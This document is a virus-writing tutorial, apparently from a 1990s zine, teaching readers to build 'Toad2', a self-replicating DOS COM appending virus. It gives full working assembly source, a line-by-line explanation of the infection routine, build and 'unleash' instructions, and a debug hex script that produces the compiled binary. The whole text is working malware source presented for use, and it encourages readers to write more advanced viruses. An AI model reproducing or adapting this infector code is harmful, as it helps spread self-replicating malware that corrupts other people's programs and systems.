Lesson 2
                   The COM Appending Virus
                             By
                         Horny Toad
                              
                              
                              
     In the first lesson, we discussed how to write the most
basic form of virus, the overwriting virus.  This type of
virus has serious deficiencies which, I hope, should be very
obvious to you.  Nonetheless, the basic overwriting virus is
a necessary stepping stone in the overall virus writing
curriculum.  The next virus that we will be looking at is
the COM appending infector.  This virus is a step up in that
it infects the host program without destroying it.
     As the complexity of the virii increase, so do the
concepts that pertain to them.  With the overwriting virus,
we weren't very concerned with the host program, the one
that we were infecting, quite simply, because it was going
to be destroyed.  With the appending virus, our ultimate
goal is not to harm the host program, but to slightly modify
it to hold the virus code and then be able to run itself.
Therefore, with the appender, you really need to visualize
what is happening with your virus code and the effects on
the host program.  Memory usage and management are going to
start playing a bigger part in your virus writing.  And you
can't relax after learning this virus, with EXE infectors,
resident and boot virii, memory will continue to haunt you.
Then, once you have a grasp on memory management, I will
through some windows programming your way and utterly
confuse you.  At this stage, just be happy with the virus
that is in this tutorial.  You have accomplished a great
success when you can not only produce appending virii, but
really understand what is going on.  Don't listen to the
people that criticize the shit out of overwriting and com
appenders.  Understanding the basic concepts in virus
programming will help to build a solid foundation in your
coding skills and make the more difficult resident virii
easier to grasp.
     I have decided to continue with the format that I
used in the first lesson to describe this virus.  Therefore,
when you are coding in the future and need a quick
explanation of a certain technique, you only need to glance
at the individual sections of this tutorial.  Also, I do
expect that you have gone through the first tutorial on
overwriting infectors.  In keeping with the Codebreaker's
idea of easy-to-understand articles, I will continue to
describe all of the basic assembly code, even if it was
already touched upon in the first lesson.
     I must add that the code in this article is unoptimized
for the purpose of instruction.  I specifically divided the
code up into many different routines so that I could comment
on each of them and what they do in the virus itself.  I
also will add that I code TASM-friendly assembly.  I only
use Borland's Turbo Assembler.  I suggest that you use it.
It is very easy to understand and the majority of virii out
there are written with TASM in mind.  If you still want to
use MASM or some other assembler, fine, just make sure that
you know the format that your code has to be in.
     After I published the last tutorial, I received a few
complaints that people didn't fully understand the use of
registers and memory addressing.  It was not my goal to
completely explain the use of certain complex concepts in
the first tutorial.  You did not need to know complex memory
management to write an overwriter.  In this tutorial, I will
not be going over hooking interrupts, extended registers, or
in-depth flag usage.  Such techniques are not needed to
understand a COM appender.  In the next tutorial, I will be
discussing EXE appenders and, in the fourth tutorial,
resident virii.  Be patient.  Wait to understand the more
difficult concepts once you need them.  Otherwise, you will
only get confused.
     Well, on with the virus.  I will go ahead and give you
a copy below of the basic COM appender, so that, throughout
the tutorial, you can reference back to the basic skeleton
code.  During the explanation of the individual parts of
code, I will offer different techniques to accomplish the
same results as you see in the basic code.



code segment
     assume cs:code,ds:code
     org 100h

start:
     db 0e9h,0,0

toad:
     call bounce

bounce:
     pop  bp
     sub  bp,OFFSET bounce

first_three:
     mov cx,3
     lea  si,[bp+OFFSET thrbyte]
     mov  di,100h
     push di
     rep movsb

move_dta:
     lea  dx,[bp+OFFSET hide_dta]
     mov  ah,1ah
     int  21h

get_one:
     mov  ah,4eh
     lea  dx,[bp+comsig]
     mov  cx,7

next:
     int  21h
     jnc  openit
     jmp  bug_out

Openit:
     mov  ax,3d02h
     lea  dx,[bp+OFFSET hide_dta+1eh]
     int  21h
     xchg ax,bx

rec_thr:
     mov  ah,3fh
     lea  dx,[bp+thrbyte]
     mov  cx,3
     int  21h

infect_chk:
     mov  ax,word ptr [bp+hide_dta+1ah]
     mov  cx,word ptr [bp+thrbyte+1]
     add  cx,horny_toad-toad+3
     cmp  ax,cx
     jz   close_up

jmp_size:
      sub  ax,3
      mov  word ptr [bp+newjump+1],ax

to_begin:
      mov ax,4200h
      xor cx,cx
      xor dx,dx
      int 21h

write_jump:
      mov ah,40h
      mov cx,3
      lea dx,[bp+newjump]
      int 21h

to_end:
      mov ax,4202h
      xor cx,cx
      xor dx,dx
      int 21h

write_body:
      mov ah,40h
      mov cx,horny_toad-toad
      lea dx,[bp+toad]
      int 21h

close_up:
      mov  ah,3eh
      int  21h

next_bug:
      mov  ah,4fh
      jmp  next

bug_out:
      mov  dx,80h
      mov  ah,1ah
      int  21h
      retn


comsig db '*.com',0
thrbyte db 0cdh,20h,0
newjump db 0e9h,0,0

horny_toad label near

hide_dta db 42 dup (?)

code    ENDS
        END    start



Well, that is the basic code that we will be using for the
virus.  Now, before we get into discussing what the
individual lines of code do, let's try to conceptualize what
a COM appending virus is.  Take a look below at the steps
that a COM appending virus takes when executed.

Outline of the COM Appending Virus

1. Determine the Delta Offset
2. Restore the infected file's original 3 bytes
3. Set a new DTA address
4. Find a COM file.
5. If none then go to step 16.
6. Open the file.
7. Read and store the first 3 bytes of the file.
8. Check if file has been previously infected.
9. Calculate the size of the jump to main virus body.
10. Move to the beginning of the file.
11. Write the jump to the main virus body.
12. Move to the end of the file.
13. Append the virus main body to the end of the file.
14. Close the file.
15. Find next matching file. Back to step 4.
16. Return the DTA to 80 hex and restore control to host
program.


I swore that I would never include cheesy graphics in my tutorials,
but I guess I should, in order to give you a picture of what the
virus and the host program look like before and after infection.


Toad2 Virus                Innocent Program
163 bytes                  200 bytes
-----------                -----------
=         =                =         =
=         =                =         =
=         =                =         =
=         =                =         =
=         =                =         =
=         =                =         =
=         =                =         =
=         =                =         =
-----------                -----------


            After Infection

0ffset 100h  ---------------
             =Jump to Virus=  
             =Main Body    =  -  3 bytes long
             =-------------=
             =             =  The delta offset is the calculation
             = Innocent    =  of the amount of space that the virus
             = Program     =  main body has moved down past the Innocent
             = Main Body   =  program main body.
             =             =   
             =             = 
             =-------------=  
             =             =
             = Virus Main  =
             = Body        =
             =             =
             =             =
             =             =
             =Data Section =
             =of Virus     =
             =--Original---=
             =--3 bytes of-=
             =--Innocent---=
             =--Program----=
             =-------------=
              



Hopefully, I haven't completely discouraged and confused you.
Once the individual sections of code are explained, all of
these steps will make sense.
Something that you must remember when looking at the virus
code is that the virus is currently in its first generation.
It hasn't yet infected a file.  When you are trying to figure
out how the virus code works, you will have to think of it in
terms of the first time it runs as well as when the infected
program is running.

Well, lets have a look at the code.

_____________________________________________________________________

code    segment

The segment directive defines the parameters for a segment.
In this instance we are defining the code segment.  All of
the executable code, the meat of our program will lie inside
of the code segment.  This segment does not necessarily have
to be named "code" segment, but it is only logical, and a
good programming convention, to name it the "code" segment.
If we were dealing with a larger program, one that had many
procedures of external calls, we would definitely want to
define a specific segment as our data segment separate from
the code.  Since this is a very small piece of code, the two
will be intermixed.



_____________________________________________________________________

assume  cs:code,ds:code


The assume directive lies within the code segment and
matches the name that you gave your segment, such as code,
with associated register.  In our program, we are stating
that the code and data segment registers will be associated
with the "code" segment.  What does this mean?  Basically we
are still setting up the parameters of our COM file.  We are
following convention by defining where things are in our
program and how they are set up.  What are the CS and DS
registers?  The code segment register is going to contain
the starting address of your programs code segment. .
Essentially, it tells your computer where to begin to look
for your executable code.  The DS register contains the
starting address for the data section.  Another register
that I might as well bring up is the IP or instruction
pointer register.  The job of the IP is to contain the
offset address of the next line of code that is to be
executed.  What is an offset address?  An offset address is
not a true address of a line in your program, rather a value
of the distance away from a given point.  If you put two
concepts together, the code segment register added to the
instruction point register will give you the next executable
line in your program.  The CS will stay constant as the IP
counts up the lines of code.



_____________________________________________________________________

org     100h

You should remember this from the overwriting virus.  This
directive is telling the computer that our virus is a COM
file located at 100 hex or 256 bytes.  This 100 hex distance
is actually an offset directly after the PSP or program
segment prefix.  The value 100h is placed in the IP, telling
the computer where to begin.  PSP contains information about
your program and is created in memory when the program is
loaded


_____________________________________________________________________

start:
     db 0e9h,0,0

The first instruction that needs to be coded is the jump to our
virus code.  In the initial execution of our virus, we only
want control to the next line of code, so we define a blank
jump.  The DB or "define byte" directive is most commonly
used in the data section of our virus to define strings of
information.  In this instance, we are literally defining an
assembly instruction manually.  The instruction that we are
defining is "jump."  At the lowest level, the level at which
the computer processes code, the instruction "jmp" has been
transformed by the compiler to it's binary form "11101001."
In coding assembly, the preferred numerical system is
hexadecimal, so we convert the binary to e9h.  No way am I
getting into describing how to manually convert bin-dec-hex.
I prefer to let my little old Casio do the conversions for
me.  Get back on track Toad.  Do you think that the jump
instruction stays null once the virus has infected a
program?  If you answered "No", then congratulations.  Once
the virus has infected a program, the first instruction in
the code of the infected host will be a jump to the main
virus body.  Each time the virus infects a program, the
first 3 bytes, including the jump instruction will be
rewritten with a calculation to jump over the host program
to the virus main body.  As we progress through the virus,
this will all become clearer.



_____________________________________________________________________

toad:
     call bounce

bounce:
     pop  bp
     sub  bp,OFFSET bounce


The Delta Offset.  This is probably the most singular
important concept that you will have to learn when coding an
appending virus. When you compile the virus for the first
time, the assembler calculates the value of all of the
offsets.  Once the virus has appended itself to the end of
the host program, the offsets that the assembler calculated
are now all incorrect.  The offsets do not take into account
the amount of space the code has moved forward, beyond the
host program. Before we go into the calculation of the delta
offset, lets look at the new instructions within this
routine.  The first is the "call" instruction.  If you
remember the old BASIC computer language, call is like
GOSUB.  A call instruction pushes the IP onto the stack.
Ok, let's take a look at that last sentence.  What does it
mean?  Who's pushing who?  And what the hell is a stack?
Don't panic, we are going to take this nice and easy.  The
stack is a temporary memory location that can be used to
store such things as the IP (the address of the next
instruction) during a "call".  The term "push" means that
the data is being moved onto the stack.  The opposite of
"push" is "pop".  The pop instruction merely transfers the
data that was just pushed onto the stack to a specified
destination.   Don't freak out on me with this.  At this
point, this is all I want you to know about the stack, a
temporary memory location.  On to the calculation.  The call
instruction pushes the IP, the address of the next
instruction on to the stack.  We then pop this address into
the bp.   Then subtract the original offset of bounce, which
was determined at the virus' original compilation, from the
value in bp.  The <B>ase <P>ointer is a 16 bit register used
for holding certain parameters, in this case, our delta
offset.  All offset addresses in the main virus body will
need to have bp added on to them.  During the first
generation of the virus, the delta offset, or the bp, will
be zero.


_____________________________________________________________________

first_three:
     mov cx,3
     lea  si,[bp+OFFSET thrbyte]
     mov  di,100h
     push di
     rep movsb

The first_three routine writes the host program's original
three bytes back to it's original location (in memory) at
location 100 hex, the beginning of the program.  The
instructions to do this are fairly simple and should look
somewhat familiar.  What do the brackets with the <L>oad
<E>ffective <A>ddress instruction mean?  The brackets are
index specifiers.  This is telling the processor to use the
combined contents of the brackets as a single offset
address.  This is also the first time that the delta offset
in the <B>ase <P>ointer register is being used.  Now to the
next odd looking thing, "rep movsb." Rep stands for the
"repeat" instruction.  CX is loaded with the amount of times
that the instruction will repeat.  In this case the "movsb",
or moves bytes, instruction will be repeated three times.
The <S>ource <I>ndex is loaded with the address of the bytes
that we want to move and the <D>estination <I>ndex is loaded
with the address of where we want the bytes to be moved. We
are going to use the "push" instruction again to push the di
location (100 hex) on to the stack to be used later in the
virus (see bug_out).
This routine could also be written as:

first_three:
     lea  si,[bp+OFFSET thrbyte]
     mov  di,100h
     push di
     movsw
     movsb

The difference is that we are no longer repeating the single
byte moves.  Instead, we still move 3 bytes by using the
"movsw", or moves word, and movsb. So what the hell is a
word in relation to a byte?

                      Bytes
----------------------------
Word                    2
Doubleword              4
Quadword                8
Paragraph              16
Page                  256



_____________________________________________________________________

 move_dta:
     lea  dx,[bp+OFFSET hide_dta]
     mov  ah,1ah
     int  21h

Moving 1a hex into AH and doing an int 21 will set the DTA,
disk transfer area, address to a specified location in DX.
In this case, we want to put the DTA of the file being
infected at the end of our virus at offset hide_dta.  The
DTA will remain and can be accessed at hide_dta + bp.  At
the end of the infection process, we will move the DTA back
to it's original location at 80 hex.
So what is actually in the <D>isk <T>ransfer <A>rea and why
are we moving it?

                               The DTA
------------------------------------------------------------

Offset       Size                       Function

0h           21 Bytes                   Reserved
15h           1 Byte                    File Attributes
16h           2 Bytes(WORD)             File Time
18h           2 Bytes(WORD)             File Date
1Ah           4 Bytes(DWORD)            File Size
1Eh          13 Bytes                   File name string

The DTA is located within the <P>rogram <S>egment <P>refix.
See Appendix 2 for the complete format of the PSP.  When a
program is executed, the program loader builds a PSP
starting at address 00 hex.  The PSP is 256 bytes (100 hex)
long and contains information for executing the program.
The DTA is located at offset 80 hex of the PSP.  As you can
see in the above chart, the DTA contains very useful
information that we need to reference in our virus.  It is
good practice, especially when altering information in the
DTA, to set a new DTA in a temporary location.  Therefore,
the host program DTA is not being changed or corrupted
during the infection process.


_____________________________________________________________________

get_one:
     mov  ah,4eh
     lea  dx,[bp+comsig]
     mov  cx,7

next:
     int  21h
     jnc  openit
     jmp  bug_out

You should remember this from the overwriting virus.  A very
useful piece of code that finds the first file in the
current directory with the attributes that are specified in
CX and DX.  We load DX, in this case, with "*.com" that is
defined in comsig in the data area of our virus.  CX is
loaded with 7 which looks for a file with any attributes.
The jump instruction "jnc" tests the carry flag.  Remember
the carry flag from the overwriting virus?  If a file is
found, the carry flag is set to zero and the jump is made to
openit.  Otherwise, the jump is made to bug_out.


_____________________________________________________________________

openit:
     mov  ax,3d02h
     lea  dx,[bp+OFFSET hide_dta+1eh]
     int  21h
     xchg bx,ax


The openit routine takes the file that was just found and
opens it for read and write with int 21 AX=3d02 hex.  You
will also have to load DX with the address of the filename
string.  Remember that the filename is stored in the DTA,
bp+hide_dta, at offset 1e hex.  Once the file is opened, the
file handle is put in AX.  For all subsequent uses of the
file, we need to move the handle to BX.  This is done with
the xchg instruction.  If you remember from the last
tutorial, "mov bx,ax" can also be used, but it is one byte
longer than using the xchg instruction.



_____________________________________________________________________

rec_thr:
     mov  ah,3fh
     lea  dx,[bp+thrbyte]
     mov  cx,3
     int  21h

This routine reads a record, or a certain number of bytes
into a specified location.  AH is loaded with 3f hex to
specify the read record function.  DX is loaded with the
address of the input area, or the location that we want the
bytes to be stored.  In this case, the bytes are to be
stored in thrbyte + bp, which is located in the data area of
our virus.  CX is loaded with the number of bytes that we
are going to read.  The purpose of this function in our
virus is to store the first three bytes of the program to be
infected to a specified place within our virus.  Part of the
infection process will be to write a jump, located in the
first three bytes of the infected program, to our main body
virus code that is located at the end of the infected
program.



_____________________________________________________________________

infect_chk:
     mov  ax,word ptr [bp+hide_dta+1ah]
     mov  cx,word ptr [bp+thrbyte+1]
     add  cx,horny_toad-toad+3
     cmp  ax,cx
     jz   close_up


The infect_chk routine checks to see if the file that the
virus just opened has already been infected.  Don't worry,
it looks a lot more difficult than it actually is.  First of
all we move the file size into AX.  The file size is located
at offset 1a hex in the DTA.  Remember that our DTA is
stored at bp + hide_dta.  Next, we move the second and third
bytes from bp + thrbyte into CX.  If the file had already
been infected, then the amount of the jump to our main virus
body would now be in CX.  Now if we add the length of the
virus plus the three initial bytes and compare the amount to
the filesize in AX, if the two are equal, the file is
already infected and the we jump to the close_up routine.
If the two amounts are different then control simply passes
to the next instruction at the beginning of the jump_size
routine.


_____________________________________________________________________

jmp_size:
      sub  ax,3
      mov  word ptr [bp+newjump+1],ax


In the last routine, infect_chk, the file size was loaded
into AX.  We will now subract, "sub", 3 (bytes) from the
file size in AX to account for the 3 byte jump written to
the beginning of the file.  Therefore, AX now holds the
distance of the jump that must be made to get to our main
virus body.  In order to store this jump in new jump, we
must use the index specifiers (brackets) to add the bp
(delta offset) plus the offset of newjump plus 1 (to account
for the jump over the e9 hex).


_____________________________________________________________________

to_begin:
      mov ax,4200h
      xor cx,cx
      xor dx,dx
      int 21h

In order to write the jump to our virus code, we need to
move the file pointer to the beginning of the host program.
As you can see, after loading 42 hex into AH, we need to
zero out CX and DX.  For this task we use our handy dandy
XOR instruction.  Remember that if we XOR a register with
itself, the register is cleared to zero.
You will also see the above routine written in many virii
as:
to_begin:
     mov ax,4200h
     cwd
     xor cx,cx
     int 21h

I hesitate to show you this, but you should know what it
means if you see it.  The "cwd" instruction, or <C>onvert
<W>ord to <D>oubleword, extends the value in AX through DX
from a WORD to a Doubleword, thus zeroing out DX.


_____________________________________________________________________

write_jump:
      mov ah,40h
      mov cx,3
      lea dx,[bp+newjump]
      int 21h

This routine writes the jump instruction that was stored in
new_jump + bp to the beginning of the host program.  The
length of the jump is 3 bytes, as indicated with the amount
loaded into CX.



_____________________________________________________________________

to_end:
      mov ax,4202h
      xor cx,cx
      xor dx,dx
      int 21h

This is essentially the same thing as the to_begin routine
except that it moves the file pointer to the end of the host
program so that we can write the main body of our virus.
The only difference with to_end and to_begin is the 02 hex
loaded in AL.


_____________________________________________________________________

write_body:
      mov ah,40h
      mov cx,horny_toad-toad
      lea dx,[bp+toad]
      int 21h

This routine is practically a ditto of the write_jump routine.
With this one, we are writing the main body of the virus to the
end of the host file.  CX is loaded with the length of the virus
not including the initial jump. Remember that CX is just a
measurement, the entire virus is not being moved into the CX
register.  DX, as usual, contains the starting address from which
to write.


_____________________________________________________________________

close_up:
     mov  ah,3eh
     int  21h

Setting 3e hex into AH and initiating an int 21 closes the
current file.  This operation updates the directory and FAT,
file allocation table with the date and file size.


_____________________________________________________________________

next_bug:
     mov  ah,4fh
     jmp  next

This instruction should look familiar from the overwriting
virus.  Moving 4f hex into AH sets up the find next file
routine.  What this does is take the attributes that we
loaded when the 4e hex routine was initiated in get_one and
find the next file that contains those attributes.  You will
notice that the int 21 is done after the jump is made to
next.


_____________________________________________________________________

bug_out:
     mov  dx,80h
     mov  ah,1ah
     int  21h
     retn

The bug_out routine replaces the DTA address to 80 hex and
transfers control over to the host program.  In the case of
the first generation virus being run, an int 20, or terminate
program, is issued in the first three bytes to terminate
operations.  The "retn" instruction is the means that we use
to return control to the host program. The return instruction
moves the word at the top of the stack into the IP. Remember
in the first_three routine when we pushed the di (100 hex) onto
the stack?  We were actually setting up the return sequence to
hand control back to the original program. If you hadn't pushed
di (100 hex) on to the stack at the beginning of the virus, you
could now replace the retn with:

mov di,100h
jmp di

or

push 100h
ret

Basically anything that will transfer control to offset 100 hex, the
beginning of the host program in memory.


_____________________________________________________________________

comsig db '*.com',0
thrbyte db 0cdh,20h,0
newjump db 0e9h,0,0

horny_toad label near

hide_dta db 43 dup (?)

Now we get to the data area of our virus.  For convenience
and organization we will define all the necessary data here
at the end of the virus.  Since we have not actually
declared this area to be a data section, the information
defined here could very well be located at the beginning of
the virus.  Now let's look at the information that we are
defining.  This should all look familiar because the virus
has already utilized all of this data during the execution
of the above code.  The first thing that we define is
thrbyte.  Thrbyte holds the first three bytes of the
infected program, which are replaced with the jump to the
virus main body.  Only on the first run of the virus will
this be cd hex - 20 hex, or int 20h, terminate program.
These are the three bytes that will be written in memory to
location 100 hex.  On completion of the infection process,
control of the host program will be returned and the
instructions at 100 hex will be executed.  On the first run
of the virus, we simply want the virus to terminate after it
has infected all of the COM files that it has found.
Otherwise, we would have a vicious loop of the virus
continuing to search for more files.
     The next piece of data that we will define is newjump.
Initially newjump will hold only a blank jmp instruction (e9
hex).  Newjump is calculated in jmp_size and actually
written to the newly infected file in the write_jump
routine.
     The next line is simply a marker, horny_toad.  Remember
that we used the same near label in the overwriting virus
just as a place to reference the end point of the
operational virus.  This line has no other purpose in the
virus.
     The last thing that is defined in the virus is the
hide_dta. This is the area that we will use to store the DTA
during our virus operation. The DTA is 43 (2B hex) bytes long.
Therefore we use the duplicate instruction to set up the amount
of area for the DTA.


_____________________________________________________________________

code    ends
end     start

     The next two lines essentially close up the virus code.
"Code ends" defines the end of the code segment.  If I had
defined a data segment, I would have ended it with "data
ends."  The end directive marks the end of the virus.  Start
indicates to the computer where to start execution of the
code, which should be somewhere in the code segment.  Sorry
for the brevity of the description of the final lines, but
they really are simple, they are completing, or closing up
the beginning lines of our virus code.

_____________________________________________________________________

Compiling and Unleashing the Toad2 Virus

Well, congratulations, you have finished the second lesson
in virus writing.  Now you know how to write a more advanced
virus than the overwriting infector.

The next step for you to do is compile this virus and watch
it infect some files.  The program that you will be using to
compile the source code is TASM.  TASM is a very awesome
compiler.  Please, do not use MASM.  The linker program that
you will be using is TLINK, which turns the compiler's
output into an executable program.  It really doesn't matter
which editor that you use to type the asm file with.  You
can actually use any word processor that you want.  When it
comes time to compiling the virus, switch to dos and follow
the instructions below.  I would like for you to type the
virus out yourself, but I have included a zipped directory,
create, that contains the coded asm file.  In order to
compile the virus, save the virus as an ".asm" file.  With
TASM in the same directory, type:

C:\>tasm toad2.asm  (You can actually do this from any
directory that you want)

The result should be:

Turbo Assembler Version 2.01

Assembling file:         toad2.asm
Error Messages:          none
Warning Messages:        none
Passes:                  1
Remaining Memory:        425k


If there was an error in the code, TASM will indicate it in
the error messages line.  If you have typed the code in
yourself and there is an error, revert back to the file
"toad2.asm" and take a look at my code, it works. If there
are too many problems with your code and you'd just like to
see how all this stuff works, switch to the "create"
directory and type the above instructions again.  There is a
copy of the "toad2.asm" and TASM and TLINK in this
directory. What TASM has done is convert the ASM file into
an OBJ file.  In order to get an executable COM file, we
need to use the linker.  Type:

C:\>tlink /t toad2.obj

Tlink will return TOAD2.COM in the current directory.  You
now have a virus in front of you.  Don't get scared, it
won't bite.  Now you will need to move the virus from the
current directory to the pond directory. Type:

C:\>copy toad2.com c:\pond\

Then type :

C:\>cd ..\pond

This will move you to the pond directory.  Now list the
contents of the directory by typing:

C:\pond>dir

You will see that there are some files in this directory,
TOAD2.COM and FLY(1-3).COM.  TOAD.COM is your virus and the
FLY(1-3).COM are the files that you are going to infect.
FLY.COM is just a simple COM file that does absolutely
nothing.  Easy prey! Take a note of the size of the two
files, 6 and 162.  Now unleash the virus by typing:

C:\pond>toad2

Now list the contents of the directory again.  You will now
see that the files FLY(1-3) have become a little larger.
FLY(1-3).COM are now infected.  If all your attempts to
compile and link the toad2 virus fail, I have included a
compiled copy of the toad2 virus and many fly.com files in
the TOAD directory.  Change to the TOAD directory and type
toad2.  The fly files will become infected.


_____________________________________________________________________


Debug script of the Toad2 virus

For those of you who would rather not use the compiler for some
ungodly reason or if you are interested in viewing a hex dump of
the virus in first generation, here is the debug script of toad2.com.
Looking at the debug script of your virus can also help you out
in determining the length of certain parts of the virus.  Take
a look at the script below.  You can see the blank jump "e9 00 00"
at the beginning of the code for the jump to the main virus body.
Look at the end of the script and you can find the int 20 "cd 20"
and the blank jump in newjump "e9 00 00". To measure the distance
of certain parts of the virus, each two digit group equals one
byte.  For example, "e9" equals one byte.  You can determine the
total length of the virus by counting the number of groups in the
script.  In this case, the toad2 virus will come out to 163 bytes.
I hope that I have not confused you with this. I purposely put this
section at the end of the tutorial because I did not want to go
into detail on the use of debug.  In the next edition of the zine
there will be an article on using debug in virus writing.  I just
wanted to give you a taste of what is to come. In order to get a
functioning virus from the below code you need to find your copy
of debug. Cut the below code out and save it to a file called
toad2.txt.  Then at a cursor, with debug in the same directory,
type:

debug < toad2.txt


N TOAD2.COM
E 0100 E9 00 00 E8 00 00 5D 81 ED 06 01 B9 03 00 8D B6 
E 0110 9D 01 BF 00 01 57 F3 A4 8D 96 A3 01 B4 1A CD 21 
E 0120 B4 4E 8D 96 97 01 B9 07 00 CD 21 73 03 EB 60 90 
E 0130 B8 02 3D 8D 96 C1 01 CD 21 93 B4 3F 8D 96 9D 01 
E 0140 B9 03 00 CD 21 3E 8B 86 BD 01 3E 8B 8E 9E 01 81 
E 0150 C1 A3 00 3B C1 74 30 2D 03 00 3E 89 86 A1 01 B8 
E 0160 00 42 33 C9 33 D2 CD 21 B4 40 B9 03 00 8D 96 A0 
E 0170 01 CD 21 B8 02 42 33 C9 33 D2 CD 21 B4 40 B9 A0 
E 0180 00 8D 96 03 01 CD 21 B4 3E CD 21 B4 4F EB 9A BA 
E 0190 80 00 B4 1A CD 21 C3 2A 2E 63 6F 6D 00 CD 20 00 
E 01A0 E9 00 00 
RCX
00A3
W
Q


_____________________________________________________________________





Appendix 1 - The Registers


 AX     Accumulator
 BX     Base register
 CX     Counting register
 DX     Data register
 DS     Data Segment register
 ES     Extra Segment register
 SS     Stack Segment register
 CS     Code Segment register
 BP     Base Pointer register
 SI     Source Index register
 DI     Destination Index register
 SP     Stack Pointer register
 IP     Next Instruction Pointer register
 F      Flag register










Appendix 2 - The PSP (from Ralf Brown's Interrupt List)

Format of Program Segment Prefix (PSP):
Offset    Size        Description    (Table 1032)
 00h      2 BYTEs  INT 20 instruction for CP/M CALL 0 program
                   termination the CDh 20h here is often used
                   as a signature for a valid PSP
 02h      WORD     segment of first byte beyond memory allocated to
                   program
 04h      BYTE     (DOS) unused filler (OS/2) count of fake DOS
                   version returns
 05h      BYTE     CP/M CALL 5 service request (FAR CALL to absolute
                   000C0h) BUG: (DOS 2+ DEBUG) PSPs created by DEBUG
                   point at 000BEh
 06h      WORD     CP/M compatibility--size of first segment for .COM
                   files
 08h      2 BYTEs  remainder of FAR JMP at 05h
 0Ah      DWORD    stored INT 22 termination address
 0Eh      DWORD    stored INT 23 control-Break handler address
 12h      DWORD    DOS 1.1+ stored INT 24 critical error handler
                   address
 16h      WORD     segment of parent PSP
 18h      20 BYTEs DOS 2+ Job File Table, one byte per file
                   handle, FFh = closed
 2Ch      WORD     DOS 2+ segment of environment for process (see
                   #1033)
 2Eh      DWORD    DOS 2+ process's SS:SP on entry to last INT
                   21 call
 32h      WORD     DOS 3+ number of entries in JFT (default 20)
 34h      DWORD    DOS 3+ pointer to JFT (default PSP:0018h)
 38h      DWORD    DOS 3+ pointer to previous PSP (default
                   FFFFFFFFh in 3.x) used by SHARE in DOS 3.3
 3Ch      BYTE     DOS 4+ (DBCS) interim console flag (see AX=6301h)
                   Novell DOS 7 DBCS interim flag as set with
                   AX=6301h (possibly also used by Far East MS-DOS
                   3.2-3.3)
 3Dh      BYTE     (APPEND) TrueName flag (see INT 2F/AX=B711h)
 3Eh      BYTE     (Novell NetWare) flag: next byte initialized if
                   CEh (OS/2) capabilities flag
 3Fh      BYTE     (Novell NetWare) Novell task number if previous
                   byte is CEh
 40h      2 BYTEs  DOS 5+ version to return on INT 21/AH=30h
 42h      WORD     (MSWindows3) selector of next PSP (PDB) in linked
                   list Windows keeps a linked list of Windows programs
                   only
 44h      WORD     (MSWindows3) "PDB_Partition"
 46h      WORD     (MSWindows3) "PDB_NextPDB"
 48h      BYTE     (MSWindows3) bit 0 set if non-Windows application
                   (WINOLDAP)
 49h      BYTE     unused by DOS versions <= 6.00
 4Ch      WORD     (MSWindows3) "PDB_EntryStack"
 4Eh      2 BYTEs  unused by DOS versions <= 6.00
 50h      3 BYTEs  DOS 2+ service request (INT 21/RETF instructions)
 53h      2 BYTEs  unused in DOS versions <= 6.00
 55h      7 BYTEs  unused in DOS versions <= 6.00; can be used
                   to make first FCB into an extended FCB
 5Ch      16 BYTEs first default FCB, filled in from first
                   commandline argument overwrites second FCB if opened
 6Ch      16 BYTEs second default FCB, filled in from second
                   commandline argument overwrites beginning of
                   commandline if opened
 7Ch      4 BYTEs  unused
 80h      128 BYTEs commandline / default DTA
                    command tail is BYTE for length of tail, N BYTEs
                    for the tail, followed by a BYTE containing 0Dh